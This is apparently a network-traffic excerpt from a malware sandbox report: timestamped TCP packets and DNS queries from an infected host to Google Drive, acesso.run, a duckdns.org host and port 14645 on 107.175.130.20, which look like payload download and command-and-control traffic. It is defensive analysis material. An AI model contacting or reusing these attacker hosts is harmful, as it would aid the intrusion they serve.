                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.451824903 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.451862097 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.451869965 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.451900005 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.452733040 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.452759027 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.452790976 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.452796936 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.452821016 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.460293055 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.460316896 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.460391998 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.460417032 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.468558073 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.468590975 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.468625069 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.468641043 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.468669891 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.476713896 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.476735115 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.476773977 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.476792097 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.476813078 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.483911037 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.483941078 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.483968019 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.483987093 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.484134912 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.492352009 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.494190931 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.494215965 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.494261026 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.494282007 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.494298935 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.502104044 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.502130985 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.502157927 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.502178907 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.502197027 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516222000 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516243935 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516279936 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516303062 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516325951 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516756058 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516781092 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516809940 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516819000 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.516844988 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.520968914 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.520991087 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.521025896 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.521047115 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.521065950 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.525824070 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.525851965 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.525885105 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.525903940 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.525921106 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.532624960 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.532644987 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.532685995 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.532701969 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.532718897 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.536442995 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.536468029 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.536498070 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.536510944 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.536536932 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.543204069 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.543226957 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.543256044 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.543275118 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.543296099 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.548751116 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.548778057 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.548821926 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.548845053 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.548858881 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.555762053 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.555783033 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.555823088 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.555830956 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.555852890 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.567800045 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.567826986 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.567874908 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.567882061 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.567909956 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.568494081 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.568521023 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.568556070 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.568562984 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.568591118 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.569137096 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.569164038 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.569204092 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.569210052 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.569240093 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.574731112 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.574755907 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.574786901 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.574793100 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.574805021 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.574870110 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.580871105 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.580899954 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.580945969 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.580951929 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.580991030 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.591411114 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.591440916 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.591474056 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.591480970 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.591505051 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.597074986 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.597096920 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.597137928 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.597146034 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.597174883 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.601299047 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.605778933 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.605807066 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.605849981 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.605856895 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.605882883 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.612782955 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.612812042 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.612853050 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.612860918 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.612886906 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.619057894 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.619081020 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.619113922 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.619122028 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.619153976 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.633363008 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.633390903 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.633428097 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.633438110 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.633461952 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.635102987 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.635124922 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.635152102 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.635159969 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.635188103 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.639338017 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.639363050 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.639400959 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.639422894 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.639439106 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.640315056 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.643912077 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.643938065 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.643969059 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.643975973 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.643999100 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.650527954 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.650553942 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.650579929 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.650587082 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.650598049 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.654722929 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.654745102 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.654781103 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.654788971 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.654813051 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.656058073 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.656111956 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.656119108 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.656141043 CET44349175172.217.16.193192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:38.656181097 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:39.046168089 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:39.046926975 CET49175443192.168.2.22172.217.16.193
                                                                                                                                                                                                                  Oct 31, 2024 05:14:47.874474049 CET1464549176107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:47.937238932 CET4917614645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:47.942989111 CET1464549176107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:52.337728977 CET4917980192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:52.342689037 CET8049179107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:52.342763901 CET4917980192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:52.404956102 CET4917980192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.918737888 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.924452066 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.924510002 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.924549103 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.924593925 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.930090904 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.930104017 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.930114985 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.930125952 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.930157900 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.930157900 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.930157900 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.936786890 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.936798096 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.936809063 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.936820030 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.936836004 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.941447020 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.941458941 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.941468000 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.941479921 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.941714048 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.941725016 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:54.941735983 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:55.174468994 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:55.174521923 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:57.033240080 CET4917814645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:14:57.038356066 CET1464549178107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:15:17.889636040 CET1464549176107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:15:17.899792910 CET4917614645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:15:17.904776096 CET1464549176107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:15:41.179444075 CET4917780192.168.2.22178.237.33.50
                                                                                                                                                                                                                  Oct 31, 2024 05:15:41.538029909 CET4917780192.168.2.22178.237.33.50
                                                                                                                                                                                                                  Oct 31, 2024 05:15:42.146478891 CET4917780192.168.2.22178.237.33.50
                                                                                                                                                                                                                  Oct 31, 2024 05:15:43.441340923 CET4917780192.168.2.22178.237.33.50
                                                                                                                                                                                                                  Oct 31, 2024 05:15:45.843583107 CET4917780192.168.2.22178.237.33.50
                                                                                                                                                                                                                  Oct 31, 2024 05:15:47.890466928 CET1464549176107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:15:47.891607046 CET4917614645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:15:47.896493912 CET1464549176107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:15:50.742084026 CET4917780192.168.2.22178.237.33.50
                                                                                                                                                                                                                  Oct 31, 2024 05:16:00.445225000 CET4917780192.168.2.22178.237.33.50
                                                                                                                                                                                                                  Oct 31, 2024 05:16:17.906155109 CET1464549176107.175.130.20192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:16:17.907278061 CET4917614645192.168.2.22107.175.130.20
                                                                                                                                                                                                                  Oct 31, 2024 05:16:17.912174940 CET1464549176107.175.130.20192.168.2.22
                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.323180914 CET5456253192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.335694075 CET53545628.8.8.8192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.310374022 CET5291753192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.320642948 CET53529178.8.8.8192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:11.388128996 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:14:11.395148993 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:12.810957909 CET5789353192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:14:12.823636055 CET53578938.8.8.8192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:17.827606916 CET5482153192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:14:17.838762999 CET53548218.8.8.8192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:32.653656006 CET5471953192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:14:32.660675049 CET53547198.8.8.8192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.079839945 CET4988153192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.095896959 CET53498818.8.8.8192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.153709888 CET5499853192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:14:35.162396908 CET5499853192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:14:35.250314951 CET53549988.8.8.8192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:36.278942108 CET5278153192.168.2.228.8.8.8
                                                                                                                                                                                                                  Oct 31, 2024 05:14:36.287599087 CET53527818.8.8.8192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.260034084 CET53549988.8.8.8192.168.2.22
                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                  Oct 31, 2024 05:14:37.260113955 CET192.168.2.228.8.8.8d022(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.323180914 CET192.168.2.228.8.8.80xb1d5Standard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.310374022 CET192.168.2.228.8.8.80x5751Standard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:11.388128996 CET192.168.2.228.8.8.80x95cbStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:12.810957909 CET192.168.2.228.8.8.80x5e91Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:17.827606916 CET192.168.2.228.8.8.80x8dadStandard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:32.653656006 CET192.168.2.228.8.8.80x1c89Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.079839945 CET192.168.2.228.8.8.80x4292Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:34.153709888 CET192.168.2.228.8.8.80x5b5dStandard query (0)seemebest2024rmc.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:35.162396908 CET192.168.2.228.8.8.80x5b5dStandard query (0)seemebest2024rmc.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:36.278942108 CET192.168.2.228.8.8.80xb4f9Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.335694075 CET8.8.8.8192.168.2.220xb1d5No error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.335694075 CET8.8.8.8192.168.2.220xb1d5No error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.320642948 CET8.8.8.8192.168.2.220x5751No error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.320642948 CET8.8.8.8192.168.2.220x5751No error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:11.395148993 CET8.8.8.8192.168.2.220x95cbNo error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:12.823636055 CET8.8.8.8192.168.2.220x5e91No error (0)drive.usercontent.google.com142.250.185.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Oct 31, 2024 05:14:17.838762999 CET8.8.8.8192.168.2.220x8dadNo error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
